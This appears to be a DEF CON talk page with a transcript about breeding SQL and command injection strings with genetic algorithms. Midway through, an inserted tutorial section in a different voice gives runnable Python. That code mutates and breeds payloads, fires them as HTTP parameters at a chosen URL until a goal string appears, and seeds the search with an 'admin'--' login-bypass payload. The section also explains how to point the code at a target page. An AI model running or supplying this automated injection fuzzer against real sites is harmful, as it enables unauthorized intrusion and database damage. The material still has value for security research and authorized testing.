
Evolving Exploits Through Genetic Algorithms


Formal Metadata

Title
Evolving Exploits Through Genetic Algorithms
Series title
Number of parts
112
Author
License
CC Attribution 3.0 Unported:
You may use, modify, reproduce, distribute, and make publicly available the work or content, in unchanged or modified form, for any legal purpose, provided that you credit the author/rights holder in the manner specified by them.
Identifiers
Publisher
Year of publication
Language

Content Metadata

Subject area
Genre
Abstract
This talk will discuss the next logical step from dumb fuzzing to breeding exploits via machine learning and evolution. Using genetic algorithms, this talk will take simple SQL exploits and breed them into precision tactical weapons. Stop looking at SQL error messages and carefully crafting injections; let genetic algorithms take over and create lethal exploits to PWN sites for you! soen (@soen_vanned) is a reverse engineer and exploit developer for the hacking team V&. As a member of the team, he has participated in and won Open Capture the Flag at DC 16, 18, and 19. Soen also participated in the DDTEK competition at DEF CON 20. 0xSOEN@blogspot.com
Transcript: English (automatically generated)
All right. I guess we'll get started. Hi, everyone. My name is Soen, and I'm talking about evolving exploits through genetic algorithms. Before I jump into genetic algorithms, though, I want to give you a little background on who I am. I've been on […] for many years. I do programming. I love viruses and worms, I've been trained
as a computer scientist, and I do penetration testing in the daylight hours. But, you know, I'm still a noob. This talk grew mainly out of my computer science interests, my job, and my inner laziness wanting to come out. I was looking at
my job, and I thought: what I do on a day-to-day basis is exploit web applications, and there are a number of problems associated with performing this task. The major ones are these. It is driven by the customer, so you have to provide them what
they want. There's a small scope: you're only allowed to hit a tiny portion of the site, so you need scalpel-like precision. You can't hit the whole web server with a hammer. You only have a limited amount of time, usually very short, as in a day, two days, three days. And it's all report-driven, because it's
based on giving a report to the customer. These problems are what drove me to look into this area, and there are a number of ways I approached solving them. My methodology was usually to run as many scanning tools as possible against a web application and then manually look at the areas that
come up as suspicious, and from there, if it does turn out to be exploitable, I write an exploit for it. But there are a couple of problems inherent in that approach. The code coverage is inherently small, because I'm trying to limit the amount of code that I view
on a day-to-day basis: I want to view less code and make sure the code I'm viewing is actually potentially vulnerable. The inspection of suspicious areas discovered by web scanners or
manual testing is also time-costly. And the development of a working exploit for a site takes time as well, because there might be additional blocking
mechanisms in place, like a WAF, a Web Application Firewall: you can see you have SQL injection, but all of a sudden you don't really have SQL injection, because there's an additional layer you have to break through. There are a number of really good tools out there for exploit discovery and development; I use Acunetix, ZAP, and sqlmap very
frequently, and they're all fantastic tools. But running some of the other tools, like Nessus, Nmap, and other scanners, I realized there's a very
big similarity with an existing industry, and it's a fundamental problem with web application scanners as we know them today. So...
What up, bitches? It's funny. He thought you were clapping for him. He's like, well, I, you know, said sqlmap. What? Okay. All right, you know why we're here? Wow, this is the first time I have... There you go. That's what I'm talking about. At the very back, in the
gray. No, in the hoodie, man. Bring your skittles up here. Oh, what is this called? Thank you. Oh my god. That was awesome. The Price Is Right. You are here. All right.
Thank you, sir. Wait, what's your name? Connor. Connor! Connor represents all of you who are first-timers. And... DEF CON. So, foundational problems with current
techniques. Sorry, that's all I knew. I think he was talking about scanning. Oh,
scanning. Scanning and software and stuff. Oh my god, look, he's got a countdown timer. Yep. Oh shit, you only have five minutes to go, dude. Four minutes? Wow, that sucks. Oh my god. Well, thank you for the alcohol, I appreciate it. You're
welcome. So, back on track. The foundational problem with web application scanners is that the current main technologies are built around a signature-based system. They have an understanding of what a potential exploit could look like. They throw it at
the web server, and then, if they get back a favorable or unfavorable result, they mark it as a finding. And so... Okay. So I thought, hey, why not take genetic
algorithms and apply them to web applications? Why not take your average basic SQL injection and turn it from something that a web application firewall can easily protect against, and a programmer can easily defend against, into something that is much harder
to stop? This whole process of evolution is something that was really fascinating to me. So for this talk, we're going to use genetic algorithms to make exploits for SQL injection and command injection, and our attack
surfaces are HTTP and HTTPS, so web-based parameters. We're not going to cover anything else. This could be applied to a number of different things, such as JSON, AJAX, what have you, but for the scope of this talk we're talking about SQLi and command injection. The tool I wrote for this
talk is called Forced Evolution. It takes this concept of: I'm going to use genetics to write exploits for me, so I don't have to do it myself. The
algorithm is essentially this: you create a large number of things, in this case exploit strings, and you look for a certain solution that these things will provide, in this case an exploit. Then you score each string's
performance using a fitness function. We'll get into our fitness function later, but it's a way of saying, using numbers, that this injection string is better than the previous one. So our algorithm is a loop. While we haven't found the
solution, we score, we kill off all the low-performing strings, we breed the high-performing strings (the ones that bypass filters or exploit better), and we also mutate the strings randomly. Once we have found a correct exploit, we display it. The tool, Forced
Evolution, does exactly this. We create a large number of pseudo-random strings, and we draw on the history of all previous SQL injections and command injections (well, all that I could find) to influence the
population of creatures that we breed, so we're not losing evolutionary progress; we're progressing forward. So we create a large number of strings and breed in what we know has worked in the past, but we use that only to influence the population. We don't say, okay, we have a set of
signatures, because then we're back to the original problem. Then we go through exactly the same process as a generic genetic algorithm. We send the string as a parameter value, either POST or GET, and use the response from the server to determine the score. That score can be based on many things,
so we have a good deal of granularity in how we score a string. Then, just like the rest, we cull, we breed, we mutate, and when we find a string that successfully exploits an app, we display it. There are a number of things we also need to talk about. Like,
what is this fitness function? How do we decide that one string is better than another? There are a couple of things we can look at. Does it cause weird behavior? Is this string reflected? If so, there might be potential for XSS. Does this string cause an error, and if so,
is our SQL injection or command injection displayed inside that error? Also, does the exploit string cause goal data or sensitive data to be displayed, so that we can see this is potentially a good exploit?
Once we've found out what a creature's score is, we breed the top scorers and kill the underperformers. A good chunk of genetic algorithms use
genome crossover, and it works really well in our domain because we have variable-length SQL injection strings that we need to breed against each other. The breeding process consists of cutting each string in half, mixing the halves, and then mutating the results. In the current implementation in the tool, two parents create four children and also survive
themselves. So they pass on their genes and also live to see another day, until someone is better than them. Now for the next step: what do we mean by mutating strings, or mutating our exploits? So, yeah, that, my whiskey, oof.
I've found the mutation rate is usually best kept variable. There are a number of operations we can use, but it all boils down to three
essential operations: mutation, changing a single byte in a string; adding information; and removing information. So it's somewhat like natural evolution. Take the pre-mutated string ABCD. The mutations applied to it are: an X has been
prepended to the string, the B has been deleted, and the D has been mutated to an F, giving XACF. Hopefully that gives you some idea of what we're saying. We're not doing anything crazy; we're just picking a random part of the string and changing it a little. That's how we mutate the strings. Now, there are a couple of things to
keep in mind as we go through this, because with this algorithmic process of breeding, killing, breeding, killing, our population is going to vary. The mutation rate
versus search speed is very important. If we mutate too much, if every single attack string we have is going to change completely, it's essentially throwing random data at the web server, and that's really not efficient; it's not worth doing. It's like taking a bunch of dice, throwing them in the air, and
hoping you get all sixes. So the rate has to be tuned down to a point where the search is efficient. There's also the string cull rate versus the repopulation speed. If you cull more than you breed, the number of strings in your population will decrease, and vice versa: if you repopulate too quickly,
they'll multiply like rabbits and you'll denial-of-service the machine. With these things in mind, I compiled some statistics on the leading-edge tools: Acunetix, Burp, OWASP ZAP, and
sqlmap, as well as Forced Evolution. This is just the raw data, but I'll go through some charts to show you how it compares. The number of requests sent to the server is very significant: Forced Evolution sends on average maybe 10,000 to 30,000 requests to a server. So this is not exactly a stealthy
attack tool, but we'll get into some of the pros later. The time to exploit usually depends on network latency, so these numbers will fluctuate a little, but Forced Evolution performs well compared to some tools and not very well
at all compared to others. And the same for SQL injection: I compiled the same statistics for SQL injection, and the total number of requests to the server decreases dramatically, because SQL injection gives a finer way of expressing the score
associated with the fitness function. It's easier to score one string higher than another, because you have more information to do so. So it's naturally more efficient: it depends on that fitness function, that scoring mechanism, to determine which string lives and which string dies, and so it reaches a solution faster. And the time to exploit
decreases proportionally. So, with that, let's go ahead and try a demo. May the demo gods be gracious, because this does depend on Python's import random. So
let's hope everything works. There we go. Okay. Oh, this is terrible. I'm sorry. Okay, so we have a generic web application here with a login form, and it is
vulnerable to SQL injection: as you can see, I'll type in just some random characters, and it doesn't bring back correct input. There are also other problems with it. So we know a vulnerability exists there, and we can
discover this vulnerability, or this suspicious area, through other scanning tools, like we talked about previously. Now all we have to do is point Forced Evolution at it, and it'll go ahead and exploit it for us. Let me see. My VMs all of a sudden
changed size. Sorry. There we go. Okay. Forced Evolution will be up on
GitHub about 15 minutes after the talk. The command-line options are these. We have a target, and for this we'll just use localhost. We have the address of the vulnerable web page, which in this case is SQLI index dot PHP. And
then we have the vulnerable variable, which I believe is password, although I believe both would work. Then the method: it was previously displayed as POST, er, I'm sorry, GET, but the tool has both options. The
other variables we include just for completeness, so we'll include the username. Typo? I would be dangerous if I had my glasses. Okay. Username equals,
let's just say, Defcon. Then we also have what will constitute a valid
exploit. In this case, we want to get to the administrative area of the site, so our goal text will be "administrative"; we'll just put "admin". The tool parses every response it receives back and
determines whether it contains that string. On the right-hand side, I have a tail of the requests currently coming into the web server, so as we start running the tool, that will jump up. All right. Wish me luck. Here we go. All
right. Right now it has created a large number of strings. Well, actually not that large; it's only about a thousand. It's running them against the web server and scoring them based on the response it
receives back, and it's taking the top performers and breeding them. Right now we're at generation two, three; nothing crashed. Okay. Because this is
based on random strings, sometimes the solution is found
extremely quickly and sometimes it takes a while. But because of the influence of the previous database, this will become much, much faster.
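The demo runs the loop described earlier: score every string by the server's response, cull the weak ones, and breed the strong ones by half-and-half crossover. The children are then mutated by substituting, inserting or deleting characters. That loop can be sketched in Python, the language the talk says the tool depends on.

This is a hedged illustration, not the Forced Evolution source. The following are all assumptions:
- the alphabet and error keywords;
- the fitness weights;
- the population size;
- the way the four children are formed (each of the two half-swaps mutated twice).

The names evolve(), make_http_oracle() and toy_login() are hypothetical. The target is abstracted as an "oracle" function that maps a candidate string to a response body. The same loop therefore runs offline against toy_login() or against a page under test through make_http_oracle().

```python
import random
import string
import urllib.error
import urllib.parse
import urllib.request

# Assumed gene alphabet: printable ASCII without tabs or newlines.
ALPHABET = string.ascii_letters + string.digits + string.punctuation + " "
ERROR_WORDS = ("sql", "syntax", "error", "warning")  # assumed error markers
GOAL_BONUS = 100  # a score at or above this means the goal text was seen


def fitness(response, candidate, goal):
    """Score one server response; the weights are illustrative assumptions."""
    text = response.lower()
    reflected = bool(candidate) and candidate.lower() in text
    score = GOAL_BONUS if goal.lower() in text else 0
    if any(word in text for word in ERROR_WORDS):
        score += 10  # the string provoked an error message
        if reflected:
            score += 10  # and our payload appears inside that error
    elif reflected:
        score += 5  # plain reflection: possible XSS
    return score


def crossover(a, b):
    """Cut each parent in half and swap the tails."""
    ha, hb = len(a) // 2, len(b) // 2
    return a[:ha] + b[hb:], b[:hb] + a[ha:]


def mutate(s, rng, rate=0.1):
    """Substitute, insert, or delete characters at random positions."""
    chars = list(s)
    for _ in range(max(1, int(len(chars) * rate))):
        op = rng.choice(("substitute", "insert", "delete"))
        if op == "insert" or not chars:
            chars.insert(rng.randrange(len(chars) + 1), rng.choice(ALPHABET))
        elif op == "delete":
            del chars[rng.randrange(len(chars))]
        else:
            chars[rng.randrange(len(chars))] = rng.choice(ALPHABET)
    return "".join(chars)


def make_http_oracle(url, variable, method="GET", extra=None, timeout=10):
    """Hypothetical helper: send a candidate as `variable`, return the body."""
    def oracle(candidate):
        params = dict(extra or {})
        params[variable] = candidate
        query = urllib.parse.urlencode(params)
        if method.upper() == "POST":
            req = urllib.request.Request(url, data=query.encode(), method="POST")
        else:
            req = urllib.request.Request(url + "?" + query)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:
            return err.read().decode(errors="replace")  # error pages still carry signal
    return oracle


def evolve(seeds, oracle, goal, keep=10, generations=50, seed=None):
    """Score, cull, breed, mutate until a response contains the goal text."""
    rng = random.Random(seed)
    pop_size = 3 * keep  # keep survivors + 2 * keep children (keep assumed even)
    population = list(seeds)  # known payloads only bias the starting population
    while len(population) < pop_size:
        population.append("".join(rng.choice(ALPHABET) for _ in range(rng.randint(4, 16))))
    for gen in range(generations):
        scored = []
        for cand in population:
            score = fitness(oracle(cand), cand, goal)
            if score >= GOAL_BONUS:
                return cand, gen
            scored.append((score, cand))
        scored.sort(key=lambda pair: pair[0], reverse=True)
        survivors = [cand for _, cand in scored[:keep]]  # cull the rest
        children = []
        for a, b in zip(survivors[0::2], survivors[1::2]):
            for child in crossover(a, b) * 2:  # two parents -> four children
                children.append(mutate(child, rng))
        population = survivors + children  # parents survive alongside children
    return None, generations


def toy_login(candidate):
    """Offline stand-in target: the '--' comment trick reaches the admin page."""
    if "'--" in candidate:
        return "Welcome to the admin panel"
    if "'" in candidate:
        return "SQL syntax error near " + candidate
    return "Login failed"
```

For example, evolve(["admin'--"], toy_login, "admin panel", seed=1) returns ("admin'--", 0), because the seeded payload already works.

A run against a lab page might look like evolve(seeds, make_http_oracle(url, "password", extra={"username": "Defcon"}), "admin"), where url and seeds are yours to supply. A short goal string like "admin" can false-positive if the page echoes the candidate back, so a more specific goal text is safer.

Because the keep survivors stay alive and each pair of them yields four children, every generation holds exactly 3 * keep strings. That is one simple way to balance cull rate against repopulation speed. Raising rate in mutate() pushes the search toward the "throwing dice" regime the talk warns about.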
Let me bring this back over to my side. So, the pros and cons of using genetic
algorithms. There are a couple of major cons. This is not a very stealthy attack tool: as you can see, it generates a large number of requests to the web server, and that's inherent in genetic algorithms as a whole. There's also a
small potential to inadvertently destroy the database and operating system, so I wouldn't run this against a production environment. Job security? I don't know. And it is a slower process to develop and test exploits, at least from the front end, because I'm sure
anyone in the audience who sees that SQL injection would just, brrrr, write it out, and the program took, you know, 20 or 30 seconds to do it. And genetic algorithms will always be suboptimal compared to source code analysis, because source code analysis can simply cover more code. But the pros of using genetic
algorithms to create exploits are fantastic. They're really cheap in CPU, RAM, hard drive, and human time. You can run this on a Raspberry Pi; your only limiting factor is network speed, like how far
away you are from the web server. And as far as my time goes, I can just turn it on and it runs; I don't look at it again. It's good. I feel it has more complete code coverage than other black-box approaches, because not only does it have the signatures that the other black-box approaches have, it also isn't bound by a box
of thinking, by someone saying this is what we know a good SQL injection to be. It takes us to the solution. And that takes us to... yeah, right now this tool will break web applications. It might not do it
efficiently, but as the database of SQL exploits grows, it will do it more efficiently. Another huge pro is automatic exploit development. I don't have to invest my time in sitting down and
figuring out, oh, okay, I've got SQLi. Oh, okay, there's a WAF. Oh, okay, there's something else. Oh, okay, there are filtering rules. This doesn't need to know about any of those; it just cares about the question and the response. So it's really fantastic in that regard. And the last, biggest pro is emergent exploit discovery.
Since this isn't bound by what we know to be a valid exploit, it will create new things, new ways of approaching problems that we haven't seen yet. For that reason, I think it's absolutely fantastic, and I think we should pursue it. So, in conclusion, you can download the tool; give me about 15 minutes. And
there's my contact info, so.